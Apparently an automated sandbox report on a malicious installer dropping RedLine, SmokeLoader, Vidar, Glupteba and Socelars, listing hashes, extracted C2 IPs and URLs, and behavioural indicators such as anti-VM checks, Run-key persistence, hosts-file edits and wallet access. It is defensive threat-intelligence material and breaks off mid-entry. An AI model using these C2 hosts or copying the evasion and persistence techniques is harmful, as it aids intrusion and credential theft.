Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Analysis
-
max time kernel
1803s -
max time network
1770s -
platform
windows11_x64 -
resource
win11 -
submitted
17-09-2021 09:23
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210916
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20210916
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-jp
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-fr
Behavioral task
behavioral8
Sample
setup_x86_x64_install.exe
Resource
win10-en
Behavioral task
behavioral9
Sample
setup_x86_x64_install.exe
Resource
win10-de
General
-
Target
setup_x86_x64_install.exe
-
Size
6.5MB
-
MD5
591c62c68ce81550a99f07e173a56217
-
SHA1
4e5d00df20e12a0cc74189eb691e063b3a84990a
-
SHA256
1eb3574e7faa18d12759034dcc5a26ac90d79badef17cf1a744854d9a9e41cb0
-
SHA512
71f4068cc19d72251bbb29609d1ff2564228e1050c82006b82e45ac7f868c9e2cae3e738b2d3d30d372f2de4a4e1e52386cc54dede20848af4c92591dadfb4a5
Malware Config
Extracted
redline
ANI
45.142.215.47:27643
Extracted
redline
medianew
91.121.67.60:62102
Extracted
metasploit
windows/single_exec
Extracted
smokeloader
2020
http://venerynnet1.top/
http://kevonahira2.top/
http://vegangelist3.top/
http://kingriffaele4.top/
http://arakeishant5.top/
Signatures
-
Glupteba Payload 1 IoCs
Processes:
resource yara_rule behavioral4/memory/5292-472-0x0000000003000000-0x000000000391E000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Process spawned unexpected child process 4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exerundll32.exerundll32.exerundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3192 4792 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2796 4792 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2476 4792 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6620 4792 rundll32.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 6 IoCs
Processes:
resource yara_rule behavioral4/memory/5536-300-0x0000000000000000-mapping.dmp family_redline behavioral4/memory/5556-301-0x0000000000000000-mapping.dmp family_redline behavioral4/memory/5556-303-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral4/memory/5536-302-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral4/memory/5556-349-0x0000000004E30000-0x0000000005448000-memory.dmp family_redline behavioral4/memory/5348-360-0x0000000000000000-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS8FD45A90\Fri008493e5f0216a2ff.exe family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 30 IoCs
Processes:
WerFault.exeWerFault.exefaix46uT7fe2coyITPJI_gRZ.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepowershell.execsc.exeqeVAaKPbnGtNnwYgMKjlCI_r.exe1CC5.exeWerFault.exeWerFault.exeWerFault.exerundll32.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription pid process target process PID 5632 created 1652 5632 WerFault.exe Conhost.exe PID 5604 created 5100 5604 WerFault.exe Conhost.exe PID 5796 created 5800 5796 faix46uT7fe2coyITPJI_gRZ.exe setup.exe PID 6140 created 6040 6140 WerFault.exe cmd.exe PID 5224 created 5944 5224 WerFault.exe vvzQen9T8gn95mJC6pOP_HDo.exe PID 3296 created 5820 3296 WerFault.exe msedge.exe PID 5064 created 4848 5064 WerFault.exe xaiTGuks31gRBwJQPjqa0zco.exe PID 968 created 5292 968 WerFault.exe Conhost.exe PID 6248 created 5796 6248 WerFault.exe identity_helper.exe PID 6652 created 4128 6652 WerFault.exe sqINKvqX_Z4207Sj2ScquzD3.exe PID 6720 created 5756 6720 powershell.exe qSEyiynEt2usFH1F3ILQKqqn.exe PID 6684 created 6116 6684 csc.exe 4765798.scr PID 3964 created 5920 3964 qeVAaKPbnGtNnwYgMKjlCI_r.exe o3jVhWpzGcwB1rSJvh8Bh1Jy.exe PID 6944 created 4260 6944 1CC5.exe Fri008493e5f0216a2ff.exe PID 5468 created 6268 5468 WerFault.exe 8199809.scr PID 6100 created 1252 6100 WerFault.exe explorer.exe PID 1952 created 5500 1952 WerFault.exe 9h0juX45eflO0kUjSWERttjq.exe PID 2288 created 1724 2288 rundll32.exe Conhost.exe PID 6112 created 3400 6112 WerFault.exe rundll32.exe PID 1192 created 2236 1192 WerFault.exe GcleanerEU.exe PID 5248 created 1796 5248 WerFault.exe D905.exe PID 3012 created 4628 3012 WerFault.exe rundll32.exe PID 6300 created 556 6300 WerFault.exe gcleaner.exe PID 4808 created 5712 4808 WerFault.exe F9CD.exe PID 4892 created 504 4892 WerFault.exe 289.exe PID 5868 created 1692 5868 WerFault.exe 15C3.exe PID 7092 created 4436 7092 WerFault.exe E819.exe PID 3064 created 5276 3064 WerFault.exe GcleanerEU.exe PID 5376 created 4472 5376 WerFault.exe gcleaner.exe PID 6772 created 3912 6772 WerFault.exe rundll32.exe -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 1 IoCs
Processes:
resource yara_rule behavioral4/memory/5944-443-0x00000000023E0000-0x00000000024B4000-memory.dmp family_vidar -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS8FD45A90\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS8FD45A90\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS8FD45A90\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS8FD45A90\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS8FD45A90\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS8FD45A90\libstdc++-6.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS8FD45A90\libstdc++-6.dll aspack_v212_v242 -
Blocklisted process makes network request 50 IoCs
Processes:
cmd.execmd.exeMsiExec.exeflow pid process 69 5556 cmd.exe 111 5556 cmd.exe 205 6420 cmd.exe 217 6420 cmd.exe 229 6420 cmd.exe 237 6420 cmd.exe 244 6420 cmd.exe 317 1652 MsiExec.exe 318 1652 MsiExec.exe 319 1652 MsiExec.exe 320 1652 MsiExec.exe 321 1652 MsiExec.exe 322 1652 MsiExec.exe 323 1652 MsiExec.exe 324 1652 MsiExec.exe 325 1652 MsiExec.exe 326 1652 MsiExec.exe 327 1652 MsiExec.exe 328 1652 MsiExec.exe 329 1652 MsiExec.exe 331 1652 MsiExec.exe 332 1652 MsiExec.exe 333 1652 MsiExec.exe 334 1652 MsiExec.exe 335 1652 MsiExec.exe 336 1652 MsiExec.exe 337 1652 MsiExec.exe 338 1652 MsiExec.exe 339 1652 MsiExec.exe 340 1652 MsiExec.exe 341 1652 MsiExec.exe 342 1652 MsiExec.exe 344 1652 MsiExec.exe 345 1652 MsiExec.exe 346 1652 MsiExec.exe 347 1652 MsiExec.exe 348 1652 MsiExec.exe 349 1652 MsiExec.exe 350 1652 MsiExec.exe 351 1652 MsiExec.exe 352 1652 MsiExec.exe 353 1652 MsiExec.exe 354 1652 MsiExec.exe 355 1652 MsiExec.exe 356 1652 MsiExec.exe 357 1652 MsiExec.exe 358 1652 MsiExec.exe 359 1652 MsiExec.exe 360 1652 MsiExec.exe 361 1652 MsiExec.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
Processes:
___YHDG34.execmd.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts ___YHDG34.exe File opened for modification C:\Windows\system32\drivers\etc\hosts cmd.exe -
Executes dropped EXE 64 IoCs
Processes:
setup_installer.exesetup_install.exeFri009c920a62076f.exeFri000fb585dc0ad7.exeFri004dba7f4795.exeFri007b1b030a1a32.exeFri00ab2eee15cd1.exeFri008331ebfd49.exeFri00ca113a71b9d765e.exeFri00515c9ed9622f.exeFri0084ec6e65fc45d4.exeFri006a16df1a6e9ebb.exeFri00ab2eee15cd1.tmpFri00b338dc203.exeChrome 5.exe___YHDG34.exePublicDwlBrowser1100.exe2.exesetup.exeBearVpn 3.exeFri00ca113a71b9d765e.exeFri009c920a62076f.exetmpD07F_tmp.exe4765798.scruGAIOsy0cyBMLy0x8qQhbIb9.exe6947549.scrConhost.exe8736379.scrWerFault.exexaiTGuks31gRBwJQPjqa0zco.exetbb_EBPH2NSFZl1dRJn3T23f.exeidentity_helper.exeODUY8h_dRmSPnowXWsMuPfSv.exemsedge.exeM6yxelA3v8dSsoMbE76obpxX.exeqSEyiynEt2usFH1F3ILQKqqn.exeCtdIF68bUqoF1YIoatKKhDHU.exeY4E4zZMnDLS2jIMVnr7Dq9f1.exedUKKHs5vnqUP87SnnwiHWDjl.exeKsVaEglcr_unmivRYj1qqzHr.exemsedge.exeo3jVhWpzGcwB1rSJvh8Bh1Jy.exebT8zIbHyWAmMcMjVcVQvdQAq.exesqINKvqX_Z4207Sj2ScquzD3.exevvzQen9T8gn95mJC6pOP_HDo.exey4wO4hM7qudHWZvXuMrAHxuB.exeFri008493e5f0216a2ff.exeX5evWPL7qD3xAYZGheHG_oYH.exeGDhGY7j0oJbM3Xozvf7HGWwQ.exewqER3NvWNOXWCYzBLNICJiQQ.exeservices64.exeCndH5V.EXeX5evWPL7qD3xAYZGheHG_oYH.exe8199809.scr8235804.scrConhost.exe7WTxqNFpB1liTiZex_hE7hPk.exeultramediaburner.exeultramediaburner.tmpBuvufaepywu.exeJyjunanuvy.exeUltraMediaBurner.exe0_5EyHbh3gn9wu3DDMKVbe2x.exe62WXs31DiU_lPqVBteJRXwxj.exepid process 3576 setup_installer.exe 4724 setup_install.exe 1064 Fri009c920a62076f.exe 1180 Fri000fb585dc0ad7.exe 5100 Fri004dba7f4795.exe 1652 Fri007b1b030a1a32.exe 4988 Fri00ab2eee15cd1.exe 3872 Fri008331ebfd49.exe 4264 Fri00ca113a71b9d765e.exe 4512 Fri00515c9ed9622f.exe 4960 Fri0084ec6e65fc45d4.exe 4968 Fri006a16df1a6e9ebb.exe 4704 Fri00ab2eee15cd1.tmp 4528 Fri00b338dc203.exe 5404 Chrome 5.exe 5432 ___YHDG34.exe 5616 PublicDwlBrowser1100.exe 5696 2.exe 5800 setup.exe 5888 BearVpn 3.exe 5536 Fri00ca113a71b9d765e.exe 5556 Fri009c920a62076f.exe 6060 tmpD07F_tmp.exe 6116 4765798.scr 5036 uGAIOsy0cyBMLy0x8qQhbIb9.exe 5532 6947549.scr 5292 Conhost.exe 5936 8736379.scr 5348 WerFault.exe 4848 xaiTGuks31gRBwJQPjqa0zco.exe 5904 tbb_EBPH2NSFZl1dRJn3T23f.exe 5796 identity_helper.exe 4604 ODUY8h_dRmSPnowXWsMuPfSv.exe 5820 msedge.exe 4360 M6yxelA3v8dSsoMbE76obpxX.exe 5756 qSEyiynEt2usFH1F3ILQKqqn.exe 5848 CtdIF68bUqoF1YIoatKKhDHU.exe 5880 Y4E4zZMnDLS2jIMVnr7Dq9f1.exe 5856 dUKKHs5vnqUP87SnnwiHWDjl.exe 5152 KsVaEglcr_unmivRYj1qqzHr.exe 5164 msedge.exe 5920 o3jVhWpzGcwB1rSJvh8Bh1Jy.exe 5992 bT8zIbHyWAmMcMjVcVQvdQAq.exe 4128 sqINKvqX_Z4207Sj2ScquzD3.exe 5944 vvzQen9T8gn95mJC6pOP_HDo.exe 5104 y4wO4hM7qudHWZvXuMrAHxuB.exe 4260 Fri008493e5f0216a2ff.exe 552 X5evWPL7qD3xAYZGheHG_oYH.exe 5736 GDhGY7j0oJbM3Xozvf7HGWwQ.exe 4552 wqER3NvWNOXWCYzBLNICJiQQ.exe 1524 services64.exe 4036 CndH5V.EXe 724 X5evWPL7qD3xAYZGheHG_oYH.exe 6268 8199809.scr 6776 8235804.scr 6828 Conhost.exe 1656 7WTxqNFpB1liTiZex_hE7hPk.exe 6728 ultramediaburner.exe 6692 ultramediaburner.tmp 4544 Buvufaepywu.exe 1900 Jyjunanuvy.exe 5692 UltraMediaBurner.exe 5380 0_5EyHbh3gn9wu3DDMKVbe2x.exe 6380 62WXs31DiU_lPqVBteJRXwxj.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS8FD45A90\Fri000fb585dc0ad7.exe vmprotect C:\Users\Admin\AppData\Local\Temp\7zS8FD45A90\Fri000fb585dc0ad7.exe vmprotect behavioral4/memory/1180-233-0x0000000140000000-0x0000000140650000-memory.dmp vmprotect -
Checks BIOS information in registry 2 TTPs 21 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
msedge.exedUKKHs5vnqUP87SnnwiHWDjl.exey4wO4hM7qudHWZvXuMrAHxuB.exe8235804.scrInstall.exe6947549.scr4CA1.exe8736379.scrtbb_EBPH2NSFZl1dRJn3T23f.exe6BC3.exebT8zIbHyWAmMcMjVcVQvdQAq.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion dUKKHs5vnqUP87SnnwiHWDjl.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion y4wO4hM7qudHWZvXuMrAHxuB.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion y4wO4hM7qudHWZvXuMrAHxuB.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8235804.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6947549.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4CA1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8736379.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion dUKKHs5vnqUP87SnnwiHWDjl.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion tbb_EBPH2NSFZl1dRJn3T23f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4CA1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6BC3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6947549.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8736379.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion bT8zIbHyWAmMcMjVcVQvdQAq.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion bT8zIbHyWAmMcMjVcVQvdQAq.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion tbb_EBPH2NSFZl1dRJn3T23f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8235804.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6BC3.exe -
Loads dropped DLL 36 IoCs
Processes:
setup_install.exeFri00ab2eee15cd1.tmprundll32.exe2f2AnaU5O3iDx3nMNnZpwE9j.tmprundll32.exerundll32.exeinstaller.exerundll32.exeMsiExec.exeMsiExec.exerundll32.exeMsiExec.exepid process 4724 setup_install.exe 4724 setup_install.exe 4724 setup_install.exe 4724 setup_install.exe 4724 setup_install.exe 4724 setup_install.exe 4724 setup_install.exe 4704 Fri00ab2eee15cd1.tmp 6216 rundll32.exe 5364 2f2AnaU5O3iDx3nMNnZpwE9j.tmp 3400 rundll32.exe 2288 rundll32.exe 2288 rundll32.exe 5020 installer.exe 5020 installer.exe 5020 installer.exe 4628 rundll32.exe 4612 MsiExec.exe 4612 MsiExec.exe 1652 MsiExec.exe 1652 MsiExec.exe 1652 MsiExec.exe 1652 MsiExec.exe 1652 MsiExec.exe 1652 MsiExec.exe 1652 MsiExec.exe 1652 MsiExec.exe 1652 MsiExec.exe 1652 MsiExec.exe 5020 installer.exe 1652 MsiExec.exe 3912 rundll32.exe 1652 MsiExec.exe 6292 MsiExec.exe 6292 MsiExec.exe 1652 MsiExec.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\6947549.scr themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
___YHDG34.execmd.exemsedge.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Microsoft\\Fumazhynaezhi.exe\"" ___YHDG34.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\WindowsPowerShell\\Xaelaekuzhepi.exe\"" cmd.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
y4wO4hM7qudHWZvXuMrAHxuB.exedUKKHs5vnqUP87SnnwiHWDjl.exetbb_EBPH2NSFZl1dRJn3T23f.exe4CA1.exe6BC3.exe6947549.scr8736379.scrbT8zIbHyWAmMcMjVcVQvdQAq.exe8235804.scrdescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA y4wO4hM7qudHWZvXuMrAHxuB.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA dUKKHs5vnqUP87SnnwiHWDjl.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA tbb_EBPH2NSFZl1dRJn3T23f.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 4CA1.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6BC3.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6947549.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 8736379.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA bT8zIbHyWAmMcMjVcVQvdQAq.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 8235804.scr -
Drops desktop.ini file(s) 2 IoCs
Processes:
IDownload.App.exedescription ioc process File opened for modification C:\Windows\assembly\Desktop.ini IDownload.App.exe File created C:\Windows\assembly\Desktop.ini IDownload.App.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exemsiexec.exeinstaller.exeInstall.exedescription ioc process File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\R: installer.exe File opened (read-only) \??\U: installer.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\G: installer.exe File opened (read-only) \??\Q: installer.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\L: installer.exe File opened (read-only) \??\W: installer.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\J: installer.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\E: installer.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\A: installer.exe File opened (read-only) \??\O: installer.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\M: installer.exe File opened (read-only) \??\T: installer.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\Y: installer.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\F: installer.exe File opened (read-only) \??\P: installer.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: Install.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\K: installer.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 18 ipinfo.io 41 ipinfo.io 42 ipinfo.io 101 ipinfo.io 132 ipinfo.io 2 ip-api.com 2 ipinfo.io -
Drops file in System32 directory 1 IoCs
Processes:
Install.exedescription ioc process File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
Processes:
6947549.scr8736379.scrdUKKHs5vnqUP87SnnwiHWDjl.exemsedge.exey4wO4hM7qudHWZvXuMrAHxuB.exebT8zIbHyWAmMcMjVcVQvdQAq.exetbb_EBPH2NSFZl1dRJn3T23f.exe8235804.scr4CA1.exe6BC3.exepid process 5532 6947549.scr 5936 8736379.scr 5856 dUKKHs5vnqUP87SnnwiHWDjl.exe 5164 msedge.exe 5104 y4wO4hM7qudHWZvXuMrAHxuB.exe 5992 bT8zIbHyWAmMcMjVcVQvdQAq.exe 5904 tbb_EBPH2NSFZl1dRJn3T23f.exe 6776 8235804.scr 2808 4CA1.exe 6028 6BC3.exe -
Suspicious use of SetThreadContext 8 IoCs
Processes:
Fri00ca113a71b9d765e.exetmpD07F_tmp.exeX5evWPL7qD3xAYZGheHG_oYH.exe1CC5.exeservices64.exeM6yxelA3v8dSsoMbE76obpxX.exeWerFault.exedescription pid process target process PID 4264 set thread context of 5536 4264 Fri00ca113a71b9d765e.exe Fri00ca113a71b9d765e.exe PID 1064 set thread context of 5556 1064 Fri009c920a62076f.exe PID 6060 set thread context of 5348 6060 tmpD07F_tmp.exe WerFault.exe PID 552 set thread context of 724 552 X5evWPL7qD3xAYZGheHG_oYH.exe X5evWPL7qD3xAYZGheHG_oYH.exe PID 6672 set thread context of 6944 6672 1CC5.exe 1CC5.exe PID 1524 set thread context of 1252 1524 services64.exe explorer.exe PID 4360 set thread context of 6684 4360 M6yxelA3v8dSsoMbE76obpxX.exe csc.exe PID 1192 set thread context of 4908 1192 WerFault.exe 2FB2.exe -
Drops file in Program Files directory 35 IoCs
Processes:
IDownload.tmpultramediaburner.tmpY4E4zZMnDLS2jIMVnr7Dq9f1.exeIDownload.App.exe___YHDG34.execmd.exedescription ioc process File created C:\Program Files (x86)\IDownload\is-BH41A.tmp IDownload.tmp File opened for modification C:\Program Files (x86)\IDownload\MyDownloader.Spider.dll IDownload.tmp File created C:\Program Files (x86)\UltraMediaBurner\is-1KFKE.tmp ultramediaburner.tmp File created C:\Program Files (x86)\UltraMediaBurner\is-F42T5.tmp ultramediaburner.tmp File created C:\Program Files (x86)\IDownload\is-P7VHA.tmp IDownload.tmp File created C:\Program Files (x86)\IDownload\is-AQKHU.tmp IDownload.tmp File created C:\Program Files (x86)\IDownload\is-RGSHL.tmp IDownload.tmp File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe Y4E4zZMnDLS2jIMVnr7Dq9f1.exe File created C:\Program Files (x86)\IDownload\unins000.dat IDownload.tmp File created C:\Program Files (x86)\IDownload\is-J6VOG.tmp IDownload.tmp File opened for modification C:\Program Files (x86)\IDownload\unins000.dat IDownload.tmp File opened for modification C:\Program Files (x86)\IDownload\downloads.xml IDownload.App.exe File created C:\Program Files\Windows Defender Advanced Threat Protection\VAONQHHNYJ\ultramediaburner.exe ___YHDG34.exe File created C:\Program Files\Internet Explorer\NPIWBOIADZ\IDownload.exe cmd.exe File created C:\Program Files\Internet Explorer\NPIWBOIADZ\IDownload.exe.config cmd.exe File created C:\Program Files (x86)\IDownload\is-HVQAP.tmp IDownload.tmp File created C:\Program Files (x86)\IDownload\is-AVT8A.tmp IDownload.tmp File created C:\Program Files (x86)\Microsoft\Fumazhynaezhi.exe ___YHDG34.exe File opened for modification C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe ultramediaburner.tmp File opened for modification C:\Program Files (x86)\IDownload\ICSharpCode.SharpZipLib.dll IDownload.tmp File opened for modification C:\Program Files (x86)\IDownload\MyDownloader.Extension.dll IDownload.tmp File opened for modification C:\Program Files (x86)\IDownload\TabStrip.dll IDownload.tmp File created C:\Program Files (x86)\IDownload\is-1QRBJ.tmp IDownload.tmp File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe Y4E4zZMnDLS2jIMVnr7Dq9f1.exe File opened for modification C:\Program Files (x86)\IDownload\MyDownloader.Core.dll IDownload.tmp File created C:\Program Files (x86)\WindowsPowerShell\Xaelaekuzhepi.exe.config cmd.exe File opened for modification C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File opened for modification C:\Program Files (x86)\IDownload\IDownload.App.exe IDownload.tmp File created C:\Program Files (x86)\WindowsPowerShell\Xaelaekuzhepi.exe cmd.exe File created C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File created C:\Program Files (x86)\Microsoft\Fumazhynaezhi.exe.config ___YHDG34.exe File created C:\Program Files (x86)\IDownload\is-51CAE.tmp IDownload.tmp File created C:\Program Files (x86)\IDownload\is-TU0H2.tmp IDownload.tmp File created C:\Program Files (x86)\IDownload\is-6803V.tmp IDownload.tmp File created C:\Program Files\Windows Defender Advanced Threat Protection\VAONQHHNYJ\ultramediaburner.exe.config ___YHDG34.exe -
Drops file in Windows directory 31 IoCs
Processes:
msiexec.exeMsiExec.exeWerFault.exeIDownload.App.exedescription ioc process File opened for modification C:\Windows\Installer\MSI8355.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI91A2.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI493F.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI6C7C.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI7C2F.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI7DB7.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\Tasks\AdvancedWindowsManager #1.job MsiExec.exe File created C:\Windows\SystemTemp\~DFF7162D4724A991E3.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSI6371.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI7A68.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62} msiexec.exe File created C:\Windows\SystemTemp\~DF5035C15E79BE6DAE.TMP msiexec.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe File opened for 